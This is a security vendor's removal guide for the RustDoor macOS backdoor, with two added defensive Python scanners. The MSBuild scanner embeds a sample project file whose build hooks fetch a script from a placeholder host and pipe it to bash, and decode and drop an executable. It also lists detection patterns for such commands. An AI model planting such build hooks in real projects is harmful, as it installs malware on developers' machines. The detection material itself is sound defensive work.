How to remove the RustDoor malware from your Mac
Written by Tomas Meskauskas on (updated)
What kind of malware is RustDoor?
RustDoor is a Mac-targeting malware written in the Rust programming language. This malicious program has been around since at least the autumn of 2023.
At the time of writing, three variants of RustDoor have been discovered (the initial one is speculated to have been a test build). This program is classed as a backdoor: it gives the attackers covert remote access to the infected device and opens the system to further infection.
There is tenuous evidence linking RustDoor to the ALPHV (BlackCat) and Black Basta ransomware groups. The link rests on shared infrastructure, however, and infrastructure can be shared by multiple threat actors who have no actual association with one another.
RustDoor malware overview
RustDoor is a backdoor-type malware. Programs within this classification usually prep systems for further infections and/or carry them out.
After RustDoor successfully infiltrates a device, it establishes a connection to its C&C (Command and Control) server. Once connected, the program can receive and execute various commands. In practice, the attackers can run arbitrary shell commands on the infected system.
RustDoor can also manage folders and files, i.e., it can browse, create, delete, and download (exfiltrate) them. This backdoor targets files with the following extensions: ASC, CONF, DOC, JSON, KDBX, KEY, OVPN, PDF, PEM, PNG, PPK, RDP, RTF, SQL, TXT, XLS, XLSX, and ZIP. Note that several of these (KDBX, KEY, PEM, PPK, OVPN, RDP, CONF) are credential and access-configuration files, so a compromised Mac should be treated as a potential entry point into any system those files unlock. The collected files are compressed and sent to the cyber criminals' C&C server.
The malware can also write files to the device. This functionality can be used to download/install additional malicious programs or components (e.g., trojans, ransomware, cryptocurrency miners). RustDoor can monitor running processes and terminate them.
Furthermore, the backdoor can display fake dialog boxes. This functionality can be used to create decoys and to request permissions or information under false pretenses. In general, criminals tend to target log-in credentials of various accounts (e.g., emails, social media, online banking, e-commerce, cryptowallets), personally identifiable details, and finance-related data (e.g., bank account details, credit card numbers).
It must be mentioned that it is common for malware developers to improve upon their creations. Therefore, potential future iterations of RustDoor could have additional/different capabilities and features.
To summarize, the presence of malware like RustDoor on devices can lead to multiple system infections, serious privacy issues, financial losses, and even identity theft.
Name | RustDoor virus |
Threat Type | Mac malware, Mac virus, Backdoor, Trojan |
Detection Names | Avast (MacOS:Agent-AHZ [Trj]), Combo Cleaner (Trojan.MAC.RustDoor.F), ESET-NOD32 (A Variant Of OSX/Agent.DL), Kaspersky (HEUR:Backdoor.OSX.Agent.gen), Full List Of Detections (VirusTotal) |
Symptoms | Trojans are designed to stealthily infiltrate the victim's computer and remain silent, and thus no particular symptoms are clearly visible on an infected machine. |
Distribution Methods | Fake updates, infected email attachments, malicious online advertisements, social engineering, software 'cracks'. |
Damage | Stolen passwords and banking information, identity theft, the victim's computer added to a botnet. |
Malware Removal (Mac) | To eliminate possible malware infections, scan your Mac with legitimate antivirus software. Our security researchers recommend using Combo Cleaner. |
Backdoor-type malware examples
We have analyzed countless malware samples; NokNok, RShell, and OceanLotus are merely a few examples of Mac-specific backdoors.
Malicious software can have a wide variety of functionalities, which are not limited to its type/category. However, regardless of how narrow or broad a purpose malware serves – its presence on a system endangers device and user safety. Therefore, it is crucial to eliminate all threats immediately upon detection.
How did RustDoor infiltrate my device?
RustDoor has been observed being spread under the guise of genuine software or content related to it. Most of the known disguises were associated with the Mac version of Visual Studio, the Integrated Development Environment (IDE) from Microsoft. It is noteworthy that Visual Studio for Mac is due to be discontinued in 2024, so any "update" offered for it should be treated with suspicion.
The following file names have been used by RustDoor samples: "visualstudioupdate", "VisualStudioUpdater", "VisualStudioUpdater_Patch", "VisualStudioUpdating", "DO_NOT_RUN_ChromeUpdates", "Previewers", and "zshrc2".
This malicious program could use other disguises as well. At the time of the original analysis, the delivery method used to get these files onto victims' machines was unknown.
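A triage script a responder might run on a suspect Mac using the file names listed above. This is an added example, not code from the article or from the malware itself. It assumes the standard macOS persistence locations (Library/LaunchAgents, Library/LaunchDaemons and the shell start-up files in the home directory), which the article does not list, and the fixture it builds when run without arguments is constructed sample data, not real malware.

```python
"""Hunt for RustDoor file-name indicators in macOS persistence locations."""
import os
import plistlib
import re
import sys
import tempfile
from pathlib import Path

# Disguises reported for RustDoor (the list from the article), matched case-insensitively.
RUSTDOOR_NAMES = {
    "visualstudioupdate", "visualstudioupdater", "visualstudioupdater_patch",
    "visualstudioupdating", "do_not_run_chromeupdates", "previewers", "zshrc2",
}
# Assumption: standard macOS launchd and shell start-up paths, relative to a home
# directory (or to "/" for the system-wide LaunchAgents/LaunchDaemons folders).
LAUNCHD_DIRS = ("Library/LaunchAgents", "Library/LaunchDaemons")
SHELL_PROFILES = (".zshrc", ".zprofile", ".zshenv", ".bash_profile", ".bashrc", ".profile")
# Whole-token match so "visualstudioupdate" does not fire on "visualstudioupdater".
_NAME_RE = re.compile(r"(?<![\w-])(" + "|".join(map(re.escape, sorted(RUSTDOOR_NAMES)))
                      + r")(?![\w-])", re.IGNORECASE)


def name_hits(text):
    """Return the set of RustDoor names referenced in text (whole tokens only)."""
    return {m.lower() for m in _NAME_RE.findall(text)}


def scan_launchd(root):
    """Parse launchd plists (XML or binary) and flag those whose program references a known name."""
    findings = []
    for rel in LAUNCHD_DIRS:
        directory = Path(root) / rel
        if not directory.is_dir():
            continue
        for plist in sorted(directory.glob("*.plist")):
            try:
                with plist.open("rb") as fh:
                    data = plistlib.load(fh)
            except Exception as exc:  # unreadable plist is itself worth a look
                findings.append({"path": str(plist), "error": str(exc)})
                continue
            args = [str(a) for a in data.get("ProgramArguments", [])]
            if isinstance(data.get("Program"), str):
                args.insert(0, data["Program"])
            joined = " ".join(args)
            hits = name_hits(joined)
            if hits:
                findings.append({"path": str(plist), "label": data.get("Label"),
                                 "command": joined, "names": sorted(hits)})
    return findings


def scan_shell_profiles(root):
    """Flag lines in shell start-up files that reference a known name."""
    findings = []
    for name in SHELL_PROFILES:
        profile = Path(root) / name
        if not profile.is_file():
            continue
        for lineno, line in enumerate(profile.read_text(errors="replace").splitlines(), 1):
            hits = name_hits(line)
            if hits:
                findings.append({"path": str(profile), "line": lineno,
                                 "text": line.strip(), "names": sorted(hits)})
    return findings


def scan_filenames(root):
    """Walk root and return files whose base name is a known disguise."""
    return sorted(str(Path(d) / f) for d, _, files in os.walk(root)
                  for f in files if f.lower() in RUSTDOOR_NAMES)


def hunt(root):
    return {"launchd": scan_launchd(root), "profiles": scan_shell_profiles(root),
            "files": scan_filenames(root)}


def build_fixture(base):
    """Constructed sample data: one malicious-looking LaunchAgent, one benign one,
    a tampered .zshrc and a dropped file. Not real malware."""
    base = Path(base)
    agents = base / "Library" / "LaunchAgents"
    agents.mkdir(parents=True)
    with (agents / "com.apple.updater.plist").open("wb") as fh:
        plistlib.dump({"Label": "com.apple.updater", "RunAtLoad": True,
                       "ProgramArguments": ["/Users/demo/Library/VisualStudioUpdater"]}, fh)
    with (agents / "com.example.benign.plist").open("wb") as fh:
        plistlib.dump({"Label": "com.example.benign", "ProgramArguments": ["/usr/bin/true"]}, fh)
    (base / ".zshrc").write_text("export PATH=/usr/local/bin:$PATH\n~/zshrc2 &\n")
    (base / "Downloads").mkdir()
    (base / "Downloads" / "visualstudioupdate").write_bytes(b"\xcf\xfa\xed\xfe")  # Mach-O magic only
    return base


def demo():
    """Run the hunt against the constructed fixture and return the results."""
    with tempfile.TemporaryDirectory() as tmp:
        return hunt(build_fixture(tmp))


if __name__ == "__main__":
    results = hunt(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for section, items in results.items():
        print(f"[{section}] {len(items)} finding(s)")
        for item in items:
            print("   ", item)
```

Run `python3 rustdoor_hunt.py ~` against a user's home directory and `python3 rustdoor_hunt.py /` for the system-wide launchd folders; a hit is a lead to investigate, not proof of infection, and a renamed sample will not match, so pair this with an antivirus scan rather than relying on it alone.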
In general, the most prevalent proliferation techniques include: dubious download channels (e.g., freeware and third-party websites, Peer-to-Peer sharing networks, etc.), fake updates, drive-by (stealthy/deceptive) downloads, pirated programs/media, illegal software activation tools ("cracks"), malicious attachments/links in spam (e.g., emails, DMs/PMs, social media posts, SMSes, etc.), online scams, and malvertising.
What is more, some malicious programs can self-spread via local networks and removable storage devices (e.g., external hard drives, USB flash drives, etc.).
How to avoid installation of malware?
It is essential to download only from official and verified sources. We recommend activating and updating software using genuine functions/tools, as illegal activation ("cracking") tools and third-party updaters may contain malware.
Additionally, incoming emails and other messages must be treated with care. Attachments or links found in suspect mail must not be opened, as they can be infectious. We advise caution when browsing since fake and malicious online content usually appears legitimate and harmless.
We must emphasize the importance of having a reputable anti-virus installed and kept up-to-date. Security programs must be used to run regular system scans and to remove detected threats and issues. If you believe that your device is already infected, we recommend running a scan with Combo Cleaner Antivirus for macOS to automatically eliminate infiltrated malware.
Update September 18, 2024 - Cybercriminals now employ a social engineering technique that leverages professional networking platforms like LinkedIn to distribute RustDoor malware. In one instance, a fake recruiter sent a coding challenge whose Visual Studio project files contained hidden malicious bash commands. These commands then downloaded RustDoor from compromised websites.
The payloads delivered this way operate as backdoors or information stealers, and the malware establishes persistence through several mechanisms, so removing the dropped file alone is not enough.
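A way to check a received project before building it, following the recruiter-challenge lure described above. This is an added example, not the article's code and not the actual project file from that campaign. It assumes the commands are placed in MSBuild build hooks (PreBuildEvent/PostBuildEvent properties or Exec tasks inside a Target), which is where a .csproj can run shell commands; the heuristic patterns and the sample project are constructed for the demo.

```python
"""Scan MSBuild project files (.csproj and friends) for shell download-and-execute commands."""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

PROJECT_SUFFIXES = (".csproj", ".fsproj", ".vbproj", ".props", ".targets")

# Heuristics for staging or running a payload from a build hook. Assumption: a
# generic list, not indicators published for this campaign.
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b",          # fetch and pipe straight into a shell
    r"\bbase64\b[^|\n]*(-d|--decode)\b",                 # decode an embedded blob
    r"\b(ba|z)?sh\s+-c\s+['\"]",                         # sh -c '...'
    r"\bchmod\s+\+x\b",                                  # mark a dropped file executable
    r"\bnohup\b|\bosascript\b|\bxattr\s+-d\s+com\.apple\.quarantine\b",
    r"\b(curl|wget)\b.*\s(-o|--output)\s",               # download to disk
)]


def _local(tag):
    """Strip the MSBuild XML namespace that old-style .csproj files carry."""
    return tag.rsplit("}", 1)[-1]


def extract_commands(project_xml):
    """Yield (location, command) for every build hook in the project XML."""
    root = ET.fromstring(project_xml)
    for el in root.iter():
        name = _local(el.tag)
        if name in ("PreBuildEvent", "PostBuildEvent") and el.text and el.text.strip():
            yield name, el.text.strip()
        elif name == "Target":
            for ex in el.iter():
                if _local(ex.tag) == "Exec" and ex.get("Command"):
                    yield "Target %s/Exec" % el.get("Name", "?"), ex.get("Command").strip()


def scan_project(project_xml):
    """Return one finding per hook whose command matches a heuristic."""
    findings = []
    for location, command in extract_commands(project_xml):
        matched = [p.pattern for p in SUSPICIOUS if p.search(command)]
        if matched:
            findings.append({"location": location, "command": command, "matched": matched})
    return findings


def scan_tree(root_dir):
    """Scan every project file under root_dir; returns {path: findings} for flagged files."""
    report = {}
    for path in sorted(Path(root_dir).rglob("*")):
        if path.suffix.lower() in PROJECT_SUFFIXES and path.is_file():
            try:
                findings = scan_project(path.read_bytes())
            except ET.ParseError as exc:  # a project that will not parse deserves a manual look
                findings = [{"location": "parse", "command": "", "matched": [str(exc)]}]
            if findings:
                report[str(path)] = findings
    return report


# Constructed sample: a benign pre-build echo, a download-and-run post-build event,
# and a Target that decodes and drops a file named after one of the RustDoor disguises.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <PreBuildEvent>echo "restoring packages"</PreBuildEvent>
    <PostBuildEvent>curl -fsSL http://update.example.invalid/VisualStudioUpdater | bash</PostBuildEvent>
  </PropertyGroup>
  <Target Name="CustomAfterBuild" AfterTargets="Build">
    <Exec Command="echo build done" />
    <Exec Command="sh -c 'echo aGVsbG8= | base64 -d &gt; /tmp/Previewers &amp;&amp; chmod +x /tmp/Previewers'" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    report = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": scan_project(SAMPLE_CSPROJ)}
    for path, findings in report.items():
        print(path)
        for f in findings:
            print("  %-32s %s" % (f["location"], f["command"]))
```

Run it over an unzipped challenge with `python3 scan_msbuild.py ./challenge` before opening the solution in an IDE, since IDEs run these hooks on build. Solution (.sln) files are not XML and are not covered, and a pattern miss is not a clean bill of health: an unfamiliar project from an unverified contact is best built in a throwaway VM regardless.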
Instant automatic Mac malware removal:
Manual threat removal might be a lengthy and complicated process that requires advanced IT skills. Combo Cleaner is a professional automatic malware removal tool that is recommended to get rid of Mac malware. Download it by clicking the button below:
▼ DOWNLOAD Combo Cleaner for Mac
By downloading any software listed on this website you agree to our Privacy Policy and Terms of Use. To use the full-featured product, you have to purchase a license for Combo Cleaner. A limited seven-day free trial is available. Combo Cleaner is owned and operated by Rcs Lt, the parent company of PCRisk.com.
Unwanted applications removal:
Remove potentially unwanted applications from your "Applications" folder:
Click the Finder icon. In the Finder window, select "Applications". In the Applications folder, look for suspicious applications and drag them to the Trash. RustDoor does not appear under its own name; check for the file names listed above (e.g., "VisualStudioUpdater") and for any updater you did not install. After removing unwanted application(s), scan your Mac for any remaining unwanted/malicious components, since trashing the application does not remove a backdoor's persistence entries.
Frequently Asked Questions (FAQ)
My computer is infected with RustDoor malware, should I format my storage device to get rid of it?
Malware removal rarely requires formatting. A full scan with an up-to-date antivirus, followed by a check that no persistence entries remain, is normally sufficient; formatting is a last resort for an infection that cannot otherwise be cleaned.
What are the biggest issues that RustDoor malware can cause?
The threats carried by an infection depend on the malware's functionalities and the cyber criminals' modus operandi. RustDoor is a backdoor – hence, it may be used to cause chain infections, and it is capable of exfiltrating files from devices. Therefore, the primary dangers associated with this malware are chain infections, severe privacy issues, financial losses, and identity theft.
What is the purpose of RustDoor malware?
Most malicious programs are used for financial gain. However, attackers may also use malware to amuse themselves, realize personal grudges, disrupt processes (e.g., sites, services, companies, etc.), and even launch politically/geopolitically motivated attacks.
How did RustDoor malware infiltrate my computer?
RustDoor has been observed being proliferated as fake updates for the Mac version of Visual Studio and, per the September 2024 update above, via fake recruiter "coding challenges" whose project files contain malicious commands. Other disguises are likely.
Generally, malware is distributed via drive-by downloads, untrustworthy download sources (e.g., freeware and free file-hosting websites, P2P sharing networks, etc.), spam (e.g., emails, DMs/PMs, social media posts, etc.), online scams, malvertising, pirated software/media, and illegal program activation ("cracking") tools. Some malicious programs can even self-spread through local networks and removable storage devices.
Will Combo Cleaner protect me from malware?
Yes, Combo Cleaner can detect and eliminate practically all known malware infections. It must be stressed that performing a complete system scan is key since sophisticated malicious software usually hides deep within systems.